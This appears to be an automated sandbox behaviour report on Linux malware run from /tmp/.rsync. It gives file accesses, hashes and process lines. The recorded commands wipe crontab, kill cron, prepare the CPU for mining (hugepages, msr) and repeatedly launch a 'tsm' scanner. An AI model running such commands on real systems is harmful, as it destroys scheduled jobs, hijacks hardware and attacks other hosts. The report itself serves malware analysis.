
Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /sbin/sysctl N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/devices/system/node /tmp/.rsync/a/a N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/pid_max /bin/ps N/A
File opened for reading /proc/9/status /bin/ps N/A
File opened for reading /proc/22/stat /bin/ps N/A
File opened for reading /proc/734/stat /bin/ps N/A
File opened for reading /proc/735/status /usr/bin/pkill N/A
File opened for reading /proc/145/status /usr/bin/pkill N/A
File opened for reading /proc/352/stat /usr/bin/killall N/A
File opened for reading /proc/149/status /usr/bin/pkill N/A
File opened for reading /proc/151/status /usr/bin/pkill N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/733/stat /bin/ps N/A
File opened for reading /proc/23/cmdline /usr/bin/pkill N/A
File opened for reading /proc/37/cmdline /bin/ps N/A
File opened for reading /proc/660/cmdline /bin/ps N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/320/status /usr/bin/pkill N/A
File opened for reading /proc/352/cmdline /usr/bin/pkill N/A
File opened for reading /proc/22/cmdline /bin/ps N/A
File opened for reading /proc/657/status /bin/ps N/A
File opened for reading /proc/22/status /usr/bin/pkill N/A
File opened for reading /proc/653/cmdline /usr/bin/pkill N/A
File opened for reading /proc/145/cmdline /bin/ps N/A
File opened for reading /proc/691/cmdline /usr/bin/pkill N/A
File opened for reading /proc/82/cmdline /bin/ps N/A
File opened for reading /proc/352/status /bin/ps N/A
File opened for reading /proc/741/stat /bin/ps N/A
File opened for reading /proc/37/cmdline /usr/bin/pkill N/A
File opened for reading /proc/657/status /usr/bin/pkill N/A
File opened for reading /proc/14/status /bin/ps N/A
File opened for reading /proc/72/cmdline /bin/ps N/A
File opened for reading /proc/685/stat /bin/ps N/A
File opened for reading /proc/2/cmdline /bin/ps N/A
File opened for reading /proc/12/status /usr/bin/pkill N/A
File opened for reading /proc/78/status /bin/ps N/A
File opened for reading /proc/719/status /bin/ps N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pkill N/A
File opened for reading /proc/685/status /usr/bin/pkill N/A
File opened for reading /proc/685/cmdline /usr/bin/pkill N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/707/cmdline /bin/ps N/A
File opened for reading /proc/117/status /usr/bin/pkill N/A
File opened for reading /proc/374/status /usr/bin/pkill N/A
File opened for reading /proc/659/stat /usr/bin/killall N/A
File opened for reading /proc/6/status /bin/ps N/A
File opened for reading /proc/11/cmdline /bin/ps N/A
File opened for reading /proc/filesystems /sbin/sysctl N/A
File opened for reading /proc/20/cmdline /usr/bin/pkill N/A
File opened for reading /proc/15/status /bin/ps N/A
File opened for reading /proc/117/stat /usr/bin/killall N/A
File opened for reading /proc/5/cmdline /bin/ps N/A
File opened for reading /proc/17/cmdline /bin/ps N/A
File opened for reading /proc/374/status /bin/ps N/A
File opened for reading /proc/710/cmdline /bin/ps N/A
File opened for reading /proc/145/stat /usr/bin/killall N/A
File opened for reading /proc/691/cmdline /usr/bin/killall N/A
File opened for reading /proc/377/cmdline /bin/ps N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/71/status /usr/bin/pkill N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/71/cmdline /usr/bin/pkill N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/upd /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/a

[/tmp/.rsync/a/a]

/usr/bin/crontab

[crontab -r]

/bin/cat

[cat dir.dir]

/usr/bin/nproc

[nproc]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=1]

/usr/bin/find

[find /sys/devices/system/node/node* -maxdepth 0 -type d]

/sbin/modprobe

[modprobe msr]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep AMD Ryzen]

/bin/grep

[grep Intel]

/bin/cat

[cat /proc/cpuinfo]

/bin/chmod

[chmod u+x upd]

/bin/chmod

[chmod 777 a anacron cron dir.dir run stop upd]

/tmp/.rsync/a/upd

[./upd]

/tmp/.rsync/a/run

[./run]

/tmp/.rsync/a/stop

[./stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/ps

[ps x]

/bin/grep

[grep -v grep]

/bin/grep

[grep cron]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/upd

MD5 a136fbe534c2487d3c89bd6a26847bd0
SHA1 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0
SHA256 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46
SHA512 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsel-20240226-en

Max time kernel

4s

Command Line

[/tmp/.rsync/a/stop]

Signatures

Enumerates running processes

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/387/status /usr/bin/pkill N/A
File opened for reading /proc/103/stat /bin/ps N/A
File opened for reading /proc/351/stat /bin/ps N/A
File opened for reading /proc/730/status /bin/ps N/A
File opened for reading /proc/78/cmdline /usr/bin/pkill N/A
File opened for reading /proc/24/status /usr/bin/pkill N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/724/stat /bin/ps N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/351/cmdline /bin/ps N/A
File opened for reading /proc/324/status /usr/bin/pkill N/A
File opened for reading /proc/37/stat /bin/ps N/A
File opened for reading /proc/320/cmdline /bin/ps N/A
File opened for reading /proc/23/status /bin/ps N/A
File opened for reading /proc/144/stat /bin/ps N/A
File opened for reading /proc/225/cmdline /bin/ps N/A
File opened for reading /proc/726/stat /bin/ps N/A
File opened for reading /proc/77/cmdline /usr/bin/pkill N/A
File opened for reading /proc/320/cmdline /usr/bin/pkill N/A
File opened for reading /proc/70/stat /bin/ps N/A
File opened for reading /proc/76/cmdline /bin/ps N/A
File opened for reading /proc/21/cmdline /usr/bin/pkill N/A
File opened for reading /proc/36/status /usr/bin/pkill N/A
File opened for reading /proc/477/cmdline /usr/bin/pkill N/A
File opened for reading /proc/320/status /bin/ps N/A
File opened for reading /proc/3/status /usr/bin/pkill N/A
File opened for reading /proc/698/cmdline /usr/bin/pkill N/A
File opened for reading /proc/514/stat /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/pid_max /bin/ps N/A
File opened for reading /proc/17/status /bin/ps N/A
File opened for reading /proc/16/cmdline /usr/bin/pkill N/A
File opened for reading /proc/699/cmdline /usr/bin/killall N/A
File opened for reading /proc/727/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /bin/ps N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1/cmdline /bin/ps N/A
File opened for reading /proc/7/status /bin/ps N/A
File opened for reading /proc/324/status /bin/ps N/A
File opened for reading /proc/684/stat /bin/ps N/A
File opened for reading /proc/24/status /bin/ps N/A
File opened for reading /proc/82/stat /bin/ps N/A
File opened for reading /proc/144/cmdline /bin/ps N/A
File opened for reading /proc/514/cmdline /bin/ps N/A
File opened for reading /proc/79/stat /usr/bin/killall N/A
File opened for reading /proc/725/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /bin/ps N/A
File opened for reading /proc/738/status /bin/ps N/A
File opened for reading /proc/69/stat /bin/ps N/A
File opened for reading /proc/514/status /usr/bin/pkill N/A
File opened for reading /proc/699/status /usr/bin/pkill N/A
File opened for reading /proc/8/status /bin/ps N/A
File opened for reading /proc/13/status /bin/ps N/A
File opened for reading /proc/37/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3/stat /bin/ps N/A
File opened for reading /proc/730/stat /bin/ps N/A
File opened for reading /proc/470/cmdline /usr/bin/pkill N/A
File opened for reading /proc/698/cmdline /usr/bin/killall N/A
File opened for reading /proc/4/status /bin/ps N/A
File opened for reading /proc/722/stat /bin/ps N/A
File opened for reading /proc/510/stat /bin/ps N/A
File opened for reading /proc/698/status /usr/bin/pkill N/A
File opened for reading /proc/729/cmdline /usr/bin/pkill N/A
File opened for reading /proc/14/status /bin/ps N/A
File opened for reading /proc/17/cmdline /bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A

Processes

/tmp/.rsync/a/stop

[/tmp/.rsync/a/stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/ps

[ps x]

/bin/grep

[grep cron]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

Network

N/A

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsel-20240418-en

Max time kernel

147s

Command Line

[/tmp/.rsync/c/go]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A

Processes

/tmp/.rsync/c/go

[/tmp/.rsync/c/go]

/bin/uname

[uname -m]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

